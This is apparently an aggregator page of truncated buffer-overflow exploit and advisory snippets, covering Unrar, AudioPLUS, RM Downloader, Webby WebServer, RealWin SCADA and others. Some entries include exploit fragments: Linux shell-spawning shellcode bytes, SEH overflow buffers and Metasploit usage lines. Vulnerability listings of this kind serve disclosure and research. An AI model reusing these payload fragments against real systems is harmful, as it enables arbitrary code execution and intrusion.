The vulnerabilities of the Microsoft Office suite, including the Word Viewer program for reading doc files, the Office Compatibility Suite, and the Microsoft Word text editor, allow attackers to execute arbitrary code.

The vulnerabilities of the Microsoft Office suite, the Word Viewer program for reading doc files, the Office Compatibility Pack, and the Microsoft Word text editor are caused by buffer overflow attacks. Exploitation of these vulnerabilities can allow an attacker to execute arbitrary code using a...

Sam Spade 1.14 - Crawl Website Buffer Overflow

Exploit Title : Sam Spade 1.14 - Buffer OverFlow Date : 10/30/2015 Exploit Author : MandawCoder Contact : [email protected] Vendor Homepage : http://samspade.org Software Link : http://www.majorgeeks.com/files/details/samspade.html Version : 1.14 Tested on : XP Professional SP3 En x86 Categor...

Ultra-Mini-HTTPD-1.21---POST

Exploit Title: Ultra Mini HTTPD stack buffer overflow POST request Date: 16 Feb 2014 Exploit Author: Sumit Vendor Homepage: http://www.picolix.jp/ Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html Version: 1.21 Tested on: Windows XP Professional SP3 A buffer overflow is triggere...

MediaHouse Software Statistics Server LiveStats 5.2 - Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1568/info Mediahouse Statistics Server LiveStats is susceptible to a buffer overflow attack if a URL in a GET request contains over 2030 bytes. Depending on the data inserted into the request, the application will crash o...

Unrar 3.9.3 - Local Stack Overflow Exploit

No description provided by source. !/usr/bin/perl =head1 TITLE Winrar = v3.93 Local Stack-based Overflow exploit =head2 DESCRIPTION This script triggers a buffer overflow attack against Unrar, the linux popular version of WinRar extractor. It was not developped to bypass non-executing stack...

RM Downloader 3.0.2.1 (.asx) Local Buffer Overflow (SEH)

No description provided by source. !/usr/bin/python Title: RM Downloader 3.0.2.1 .asx Local Buffer Overflow SEH Date: 03-29-2010 Author: b0telh0 Link: http://www.mini-stream.net/downloads/RMDownloader.exe Tested on: Windows XP SP3 windows/exec - 227 bytes EXITFUNC=process, CMD=calc.exe shellcode ...

Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (2)

No description provided by source. source: http://www.securityfocus.com/bid/866/info Certain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distribut...

CVE-2013-1591

Stack-based buffer overflow in libpixman, as used in Pale Moon before 15.4 and possibly other products, has unspecified impact and context-dependent attack vectors. NOTE: this issue might be resultant from an integer overflow in the fastcompositescaledbilinear function in pixman-inlines.h, which...

AIX 5.3 TL 8 : libtt (IZ52845)

There is a buffer overflow vulnerability in the ToolTalk library libtt.a. A remote attacker can exploit this vulnerability when the rpc.ttdbserver is enabled in /etc/inetd.conf. The successful exploitation of this vulnerability allows a remote attacker to execute arbitrary code as the root user...

Unrar 3.9.3 - Local Stack Overflow

Unrar 3.9.3 - Local Stack Overflow !/usr/bin/perl =head1 TITLE Winrar http://www.shell-storm.org/shellcode/files/shellcode-752.php use constant SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" . "\x73\x68\x68\x2f\x62\x69\x6e\x89" . "\xe3\xb0\x0b\xcd\x80"; use constant BUFF = '-' . '3lrvs' x 820;...

Unrar 3.9.3 - Local Stack Overflow

!/usr/bin/perl =head1 TITLE Winrar http://www.shell-storm.org/shellcode/files/shellcode-752.php use constant SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" . "\x73\x68\x68\x2f\x62\x69\x6e\x89" . "\xe3\xb0\x0b\xcd\x80"; use constant BUFF = '-' . '3lrvs' x 820; $pname = "/usr/bin/unrar"; die "-File...

RealWin SCADA Server DATAC Login Buffer Overflow

This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.1 Build 6.0.10.10 or earlier. By sending a specially crafted OnFCCONNECTFCSLOGIN packet containing a long username, an attacker may be able to execute arbitrary code. This module requires Metasploit...

BarCodeWiz ActiveX LoadProperties Buffer Overflow

Added: 05/23/2011 CVE: CVE-2010-2932 BID: 42097 OSVDB: 66882 Background BarCodeWiz Barcode ActiveX Control is a tool for generating barcodes in Microsoft Office documents, and for Visual Basic, Visual C++, VB.NET, C, or Delphi developer looking to include barcodes in programs. Problem The...

Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow

Exploit Title: Integard Pro 2.2.0.9026 Win7 ROP-Code Metasploit Module Date: 2010-09-15 Author: Node Software Link: http://www.exploit-db.com/application/14941 Version: Race River Integard Pro 2.2.0.9026, integard32.dllv.2.0.0.306 Tested on: Windows 7 x64 Eng CVE : - class Metasploit3 'Race River...

File Sharing Wizard 1.5.0 - Buffer Overflow (PoC)

File Sharing Wizard 1.5.0 - Buffer Overflow PoC !/usr/bin/python http://www.sharing-file.net/ File Sharing Wizard Version 1.5.0 build on 26-8-2008 controlling EAX ESP points to our buffer buffer grows if we increase our string more details on http://www.s3cur1ty.de have fun m1k3 at m1k3 dot at...

Debian DSA-2057-1 : mysql-dfsg-5.0 - several vulnerabilities

Several vulnerabilities have been discovered in the MySQL database server. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2010-1626 MySQL allows local users to delete the data and index files of another user's MyISAM table via a symlink attack in...

Webby WebServer - Overflow (SEH) (PoC)

!/usr/bin/python POC details: SEH overwritten contact: [email protected] http://www.s3cur1ty.de App detail: http://www.shareware.de/webby-webserver/ Version 1.01 Autor Timo Gaik Lizenzart Freeware Plattformen Win XP, Win 98, Win ME Letztes Update 19.10.2004 Dateigroesse 701 KB import socket import sys...

Stack overflow

Stack-based buffer overflow in JetCast.exe 2.0.4.1109 in jetAudio 7.5.2 and 7.5.3.15 allows remote attackers to execute arbitrary code via a long ID3 tag in an MP3 file. NOTE: some of these details are obtained from third party information...

AudioPLUS 2.00.215 - .lst .m3u Local Buffer Overflow (SEH)

AudioPLUS 2.00.215 - .lst .m3u Local Buffer Overflow SEH !/usr/bin/perl by hack4love [email protected] AudioPLUS 2.00.215 .m3u / .lst File Local buffer Overflow seh Greetz to all my friends form egypt easy :d Tested on: Windows XP Pro SP2 EN my $bof="\x41" x 4116; my $nsh="\xEB\x06\x90\x90"; ...

32bit FTP (PASV) Reply Client Remote Overflow Exploit (meta)

Exploit for windows platform in category remote exploits ============================================================ 32bit FTP PASV Reply Client Remote Overflow Exploit meta ============================================================ msf use exploit/windows/ftp/32bitftppasvreply msf...